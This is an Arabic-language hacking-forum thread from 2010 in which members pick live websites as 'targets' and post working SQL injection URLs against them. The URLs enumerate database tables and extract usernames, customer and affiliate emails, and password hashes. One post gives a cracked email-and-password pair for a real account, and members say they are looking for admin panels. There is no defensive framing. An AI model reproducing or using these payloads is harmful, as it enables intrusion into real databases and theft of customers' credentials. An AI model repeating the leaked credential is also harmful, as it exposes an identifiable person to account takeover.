:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

aircrack -ng 12-16-2010 03:03 AM

الجداول فيه جدول واحد

كود:

http://crest-group.net/prod.php?cat=13&sub_Cat=-10 UNION /*!SELECT*/ 1,2,3,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8+from+information_schema.columns+/*!where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)+limit+0,1*/--
جدول اليوزر

كود:


http://crest-group.net/prod.php?cat=13&sub_Cat=-10 UNION /*!SELECT*/ 1,2,3,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8+from+information_schema.columns+/*!where+table_name=0x63675f7573657273+limit+1,1*/--

الحقنة كاملة

كود:

http://crest-group.net/prod.php?cat=13&sub_Cat=-10 UNION /*!SELECT*/ 1,2,3,/*!CONCAT(username,0x3a,pkid,0x3a,password)*/,5,6,7,8+from+cg_users--
غدا ان شاء الله
انا راح انام نعست

agentsimo 12-16-2010 03:14 AM

تصبح على خير اخ عبد الصمد
هل من هدف جديد

sniper-pal 12-16-2010 05:33 AM

اى اتفضلوو

http://www.rjtech.net/product_detail.php?id=61

سهل

إسلام العالم 12-16-2010 10:54 AM

لح يا شباب ....عم تحقنوا من ورائي....

مبارحة رحت نمت .....يلا منشوفكن المساء.....

جزاكم الله خيرا

Victors 12-16-2010 12:58 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة sniper-pal (المشاركة 268761)

الحقنة

كود:

http://www.rjtech.net/product_detail.php?id=-61+UNION+SELECT+1,2,3,4,5,6,7,8,9,GROUP_CONCAT(username,0x3a,password),11,12+from+rjtech.qweb_user--
الموقع يحتوي على اكثر من قاعده بيانات واحده

وجداول بنفس الاسم

لذلك استخدمت rjtech.qweb_user

حيث rjtech اسم قاعده البيانات و qweb_user اسم الجدول

:)

VIURIS.SA 12-16-2010 01:03 PM

[align=center]ألسلام عليكم شباب جميعا

أنا جديد بالحقن

وصلت هنا
وأتوقع انه الجدول الصحيح

كود PHP:

http://www.rjtech.net/product_detail.php?id=-61%20union%20select%201,2,group_concat%28table_name,0x3e,column_name,0x3e,table_schema%29,4,5,6,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name%20=%200x75736572-- 

الأعمده
user>User>mysql,
user>Password>mysql,
user>Select_priv>mysql,
user>Insert_priv>mysql,
user>Update_priv>mysql,
user>Delete_priv>mysql,
user>Create_priv>mysql,
user>Drop_priv>mysql,
user>Reload_priv>mysql,
user>Shutdown_priv>mysql,
user>Process_priv>mysql,
user>File_priv>mysql,
user>Grant_priv>mysql,
user>References_priv>mysql,
user>Index_ (4)

وضعت الحقنة التالية ولم تعمل
كود PHP:

    http://www.rjtech.net/product_detail.php?id=-61+union+select+1,2,concat%28User,0x3a,Password%29,4,5,6,7,8,9,10,11,12%20from%20user-- 

جربت غيرها من الجداول ولم تعمل
لكن أتوقع ان هذا هو الدجول الصحيح

شكر لكم
[/align]

VIURIS.SA 12-16-2010 01:06 PM

[align=center]اخي فيكتور سبقتني وما شفت ردك قبلي
لكن خيرها بغيرها إن شاء الله

الله يوفق
ك[/align]

Victors 12-16-2010 01:29 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة loffy (المشاركة 268853)
[align=center]اخي فيكتور سبقتني وما شفت ردك قبلي
لكن خيرها بغيرها إن شاء الله

الله يوفق
ك[/align]


يعطيك العافية اخوي

الموقع فية قواعد بيانات كثيره وكذالك جداول بنفس الاسم ومستخدمين وباسووردات

والله اعلم اي جدول فيهم يقدر يدخلنا للوحة التكم


بالتوفيق اخوي وحياك الله بغرفة الحقن :)

Dr.Unkn0wn 12-16-2010 03:40 PM

ما في هدف ؟

sniper-pal 12-16-2010 08:18 PM

هدف جديد

من عيوني

اتفضلووو

سهل وفيه فيز وشوبينج كمان


مبروك ع الجميع

http://www.integralyogaprograms.org/...imonial_id=113

Dr.Unkn0wn 12-16-2010 08:42 PM

الحقنة كاملة
كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113+UNION+SELECT+1,2,3,concat(customers_id,0x3a,customers_password),5,6,7,8+from+customers--

aircrack -ng 12-16-2010 08:53 PM

الجداول

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
جدول اليوزر

كود:


http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+table_name=0x616666696c696174655f616666696c69617465--

الحقنة كاملة

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(affiliate_email_address,0x3a,affiliate_id,0x3a,affiliate_password),4,5,6,7,8+from+affiliate_affiliate--
الهاشات لساتني احاول افكها صعبة شوي

aircrack -ng 12-16-2010 08:59 PM

وهادي الحقنة كاملة لاعضاء المشاركين في الموقع

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(customers_email_address,0x3a,customers_id,0x3a,customers_password),4,5,6,7,8+from+customers--

Victors 12-16-2010 09:33 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 269093)
الجداول

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
جدول اليوزر

كود:


http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+table_name=0x616666696c696174655f616666696c69617465--

الحقنة كاملة

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(affiliate_email_address,0x3a,affiliate_id,0x3a,affiliate_password),4,5,6,7,8+from+affiliate_affiliate--
الهاشات لساتني احاول افكها صعبة شوي

تم فك التشفير

tom@redbull.nu:0ftest123

جدوا لوحة التحكم ومبروك عليكم :)

aircrack -ng 12-16-2010 09:43 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 269114)
تم فك التشفير

tom@redbull.nu:0ftest123

جدوا لوحة التحكم ومبروك عليكم :)

يعطيك العافية اخي
جاري التنقيب عليها


الساعة الآن 06:07 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0